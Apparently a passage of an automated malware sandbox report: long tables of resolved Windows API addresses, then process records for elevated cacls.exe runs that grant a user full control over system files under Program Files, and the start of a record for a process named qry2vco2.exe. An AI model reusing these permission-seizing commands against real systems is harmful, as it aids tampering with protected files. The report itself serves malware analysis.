| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:25 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #144: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #144 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xda8 |
| Parent PID | 0x9f0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DA4
0x
D98
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000830000 | 0x00830000 | 0x0084ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x0083ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x00843fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x00851fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x00853fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x00873fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x008bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x008fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00903fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x00910fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000920000 | 0x00920000 | 0x00921fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x00a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x0096ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00970000 | 0x00971fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x00a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00a9ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00aa0000 | 0x00b5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00b9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00d3ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05050000 | 0x05386fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f240000 | 0x7f240000 | 0x7f33ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f340000 | 0x7f340000 | 0x7f362fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f365000 | 0x7f365000 | 0x7f365fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f369000 | 0x7f369000 | 0x7f36bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f36c000 | 0x7f36c000 | 0x7f36efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f36f000 | 0x7f36f000 | 0x7f36ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #145: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #145 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:58, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xda0 |
| Parent PID | 0x614 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E30
0x
D94
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000b50000 | 0x00b50000 | 0x00b6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b50000 | 0x00b50000 | 0x00b5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00b63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00b73fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b80000 | 0x00b80000 | 0x00b93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000be0000 | 0x00be0000 | 0x00c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c20000 | 0x00c20000 | 0x00c23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x00c30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00c41fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00c50000 | 0x00d0dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d50000 | 0x00d50000 | 0x00d8ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00d90000 | 0x00d91fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e10000 | 0x00e10000 | 0x00e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e20000 | 0x00e20000 | 0x00fbffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x052dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x052e0000 | 0x05616fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ec80000 | 0x7ec80000 | 0x7ed7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ed80000 | 0x7ed80000 | 0x7eda2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eda4000 | 0x7eda4000 | 0x7eda4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eda8000 | 0x7eda8000 | 0x7eda8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edaa000 | 0x7edaa000 | 0x7edacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edad000 | 0x7edad000 | 0x7edaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #146: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #146 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
